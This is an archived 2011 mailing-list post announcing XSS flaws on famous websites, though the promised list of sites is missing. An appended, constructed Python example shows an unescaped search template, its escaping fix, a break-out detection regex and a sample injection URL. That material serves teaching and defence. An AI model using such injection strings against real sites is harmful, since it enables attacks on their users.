Message-ID: <CADa+gL73hTTAZN+-pA4BSXLwRkxGYqKNTvrWbceHgZaV0Virng@mail.gmail.com>
Date: Wed, 7 Sep 2011 04:58:21 +0530
From: Mohit Kumar <thehackernews@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: 20 Famous websites vulnerable to Cross Site
	Scripting (XSS) Attack

Most of the biggest and most famous sites are found to be vulnerable to XSS
attacks. Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in web applications which allow code injection
by malicious web users into the web pages viewed by other users. Examples of
such code include HTML code and client-side scripts. An exploited cross-site
scripting vulnerability can be used by attackers to bypass access controls
such as the same-origin policy. Recently, vulnerabilities of this kind have
been exploited to craft powerful phishing attacks and browser exploits.
Cross-site scripting was originally referred to as CSS, although this usage
has been largely discontinued.

A hacker with the code name "*Invectus*" lists some such famous sites with
XSS vulnerabilities, as listed below:

Original post: The Hacker News ~
http://thehackernews.com/2011/09/20-famous-websites-vulnerable-to-cross.html
-- 
*Regards,*
*Owner,*
*The Hacker News <http://www.thehackernews.com/>*
*Truth is the most Powerful weapon against Injustice.*
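The sites in this post all share one shape of bug: a search term is reflected, unescaped, into an HTML attribute, so a query beginning `">` closes the attribute and the tag and whatever follows is rendered as markup. The example below is added here and is not code from the post or from any of the sites named; the template, the `search.example` host, the placeholder image host and the sample request are constructed. It shows the reflection defect beside its attribute-context escaping fix, and a check that decodes a logged query string the way the server would before looking for the break-out pattern.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for a search-results template that reflects the query
# into the value attribute of the search box and into the page body.
TEMPLATE = '<input type="text" name="queryText" value="{}"><p>Results for {}</p>'


def render_vulnerable(query: str) -> str:
    """Reflect the search term without escaping (the defect the post describes)."""
    return TEMPLATE.format(query, query)


def render_hardened(query: str) -> str:
    """Escape for the attribute context. html.escape(quote=True) turns '"'
    into '&quot;' as well as '<' into '&lt;', so the term can no longer close
    the value attribute or open a new tag."""
    safe = html.escape(query, quote=True)
    return TEMPLATE.format(safe, safe)


# Attribute break-out signature: a quote closing the attribute value, '>'
# closing the tag, then the start of a new tag. Matched on the *decoded*
# parameter value, never on the raw percent-encoded URL.
BREAKOUT = re.compile(r'["\']\s*>\s*<\s*[a-z]', re.IGNORECASE)


def flag_request(url: str) -> list[str]:
    """Return the names of query parameters carrying an attribute break-out.
    parse_qs percent-decodes and maps '+' to a space, which is what the
    server's search handler sees after its own decoding."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return sorted(k for k, vals in params.items()
                  if any(BREAKOUT.search(v) for v in vals))


# Constructed request in the same shape as the ones in the post (hostnames
# replaced by placeholders).
SAMPLE_URL = ("http://search.example/results?sort=date"
              "&queryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fimg.example"
              "%2Fx.png%22+width%3D%221000%22%3E")

if __name__ == "__main__":
    term = parse_qs(urlsplit(SAMPLE_URL).query)["queryText"][0]
    print(render_vulnerable(term))   # the <img> tag survives into the page
    print(render_hardened(term))     # rendered as literal text
    print(flag_request(SAMPLE_URL))  # ['queryText']
```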

